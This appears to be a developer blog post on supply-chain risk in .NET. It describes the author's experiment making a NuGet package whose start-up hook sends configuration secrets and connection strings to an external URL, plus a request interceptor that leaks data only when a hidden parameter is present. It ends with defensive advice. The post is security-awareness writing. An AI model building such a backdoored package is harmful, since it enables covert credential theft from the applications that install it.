I will just add this Nuget package to my application, what’s the worst that could happen?

Nowadays, there is an extensive amount of third party libraries easily available for you to use in your applications. This is great! You can simply focus on your core business logic and re-use all sorts of helpers and frameworks to deliver value a lot faster than you would otherwise. It’s no surprise that some applications have up to 80% of their logic based on external dependencies.

I recently attended the DevSecCon 2017 in London. It was quite an eye-opening and insightful gathering, in which two topics were mentioned a lot: the recent Equifax breach, and vulnerabilities in the code supply chain.

Every time I go to these events I try to think how relevant the subject is to me. Considering my stack is mostly .Net, how vulnerable can it be against my dependencies (or the dependencies of my dependencies, for that matter)? After all, I only use managed code and the CLR will protect me against any malicious intentions, right?

With this in mind I set myself a challenge: 
find out what the worst thing I would be able to implement on a Nuget package.

The context being what would the impact be if an internal or external Nuget package, or its dependencies, were tampered with.

Rules of the game

To make things interesting I set a few rules:

  • The malicious code must be triggered automatically. No methods from my code should need to be explicitly called from the target application. This allows it to be a lot more injectable.
  • Once executed, the code should be able to provide confidential, sensitive or internal information to the attacker.
  • Minimise traceability — making it harder for the code execution to be identified.
  • Be able to be injected at any level of the supply chain — direct dependency, their dependencies, the dependencies of their dependencies, and so on.
  • Impact ASP.NET applications — both MVC and Web APIs.

First Attempt — AppSettings and ConnectionStrings

The initial idea I wanted to prove was if I could send all (potentially) sensitive information from the configuration file to an external URL.

The key point on this code I would like to highlight is the PreApplicationStartMethod attribute, which allows an assembly to define a piece of code to be executed before anything else from the application. This is quite handy for any setup work, like registering modules. But can also be quite powerful at the wrong hands.

To make my life easier, I created a RequestBin page so I did not need to setup any server to record the information received. The result is that I did manage to get all entries from both AppSettings and ConnectionStrings to be sent over to my chosen URL:

Request information from requestb.in

To the most part, I probably ticked all the boxes in my rules. But frankly, I don’t think firing a request at start-up to an external URL will be left unnoticed by a due diligent developer/sysadmin, therefore an actual attacker may skip that approach. What could be done to make it a bit more untraceable?

Intercepting Requests

So what about intercepting all requests, but only execute the malicious piece of code when a specific parameter comes in?

I referenced the code above on the default VS template for MVC applications. That template contains three pages: Home, Contact and About. Notice that the site still works normally, but this time around the sensitive data is only exported when a page is called with the parameter ExploitActive=1. As I am using the indexed property of HttpRequest, that parameter may come from the query string, form values, cookies, or server variables collections, making it harder to trace.

MVC template About page
Same page with the parameter applied

Well, I guess that as soon as you have access to the requests and responses, you can virtually do anything. Maybe a mix both previous approaches, but submitting the sensitive data to an external server through the client side instead, potentially making it even harder to be detected.

By now it should be clear that any evil code (intentional or not), within your dependency graph may lead your application to misbehave, potentially leading to sensitive/confidential data being leaked.

My app does not contain sensitive/confidential information, why should I care?

If your application is your own blog, with low traffic, maybe this isn’t a problem at all. However, the issue above being explored in any application within an enterprise space could potentially leak:

  • Credentials that are shared with other applications that do have confidential data stored.
  • IPs, domains and server names that could be used for other types of attacks.
  • Connection strings of databases that aren’t network restricted from the internet.

Overall, any extra information can, and probably will, be used against you.

Ok, now show me an easy way to fix this! :)

One of the things you could have potentially use was Code Access Security. That allowed you to configure your ASP.Net application to run in Partial-Trust. That would force the CLR to run your site on a least-privileged sandbox in which you could fine tuned the permissions you wanted to have.

With that, if you configured your website to only be allowed to make http requests to a bunch of whitelisted domains, anything outside of that list would be blocked. Access to machine resources, such as registry, filesystem could also be restricted. It wasn’t bullet-proof though and it would not be able to protect you against the interception of requests above for example.

Anyway, that world is long gone, Microsoft has announced that support for Code Access Security and Partially-Trusted Code is discontinued in the last versions of the .Net Framework. The new .Net Core Platform does not even implement the concept.

This leaves you with potentially one option: only add dependencies you fully-trust to your project, after all, they will be executed on a full trust context.

But… who can I trust?

A while ago I read a great post by Phil Haack, where he proposes 4 questions you should ask yourself about your Nugets:

  1. Who is the author?
  2. Is the author trustworthy?
  3. Do I trust that this software was really written by the author?
  4. Is the author’s means of distributing software tamper resistant and verifiable?

The post is almost 5 years old and still completely relevant. The Nuget.org guys are still working on getting this sorted, on the roadmap they have things such as tamper-proof checksum validation and package signing. That may take some time to land and will only partially resolve the problem. This would not help with malicious packages that were not tampered with, for example.

Do your part and take responsibility!

There isn’t a magical solution here. My overall recommendation on the subject is:

Untrusted/unknown nugets

  • Every time you consider using an unknown Nuget package, decompile it and check whether there isn’t anything suspicious in it. Ideally you would do it every time you update to the latest version, however that is unrealistic unless you automate this process at your pipeline.
  • For Open Source Projects that are not well-maintained, fork the repo and assure you take control of the path-to-live. This will help you ensure the code on the public repo is the same as being packaged. An additional benefit is decreasing the time-to-fix bugs and security breaches — i.e. the only maintainer of the project is off on holidays and you need them to approve your changes for a new package to be generated.


  • Verify your application artifacts and its dependencies for tampering at your pipeline. Make sure the same files haven’t been changed throughout your path to live.
  • Code securely. Run your application always under least-privileged contexts. Process all user input adequately.
  • Ensure your package repository (Proget, Nexus, etc) is secure hardened and with the correct level of auditing.
  • Check for known OSS vulnerabilities at CI/CD. Products such as Snyk, Nexus Lifecycle and Black Duck Hub can be plugged into your pipeline to check whether there is any Common Vulnerability and Exposure (CVE) reported against the specific version of your dependencies. They can also notify you once the application is already in production and a new CVE is released.

That’s it!

It is definitely clear to me how fragile an application can be against vulnerabilities on its dependencies’ graph, especially when you consider you don’t even need to call a method to get the code executed.

It would be naive to think the problems highlighted above only impact .Net and Nuget. So whatever the platform you are using, the application is yours, whatever you add to your code base is ultimately your responsibility, remember that and act accordingly.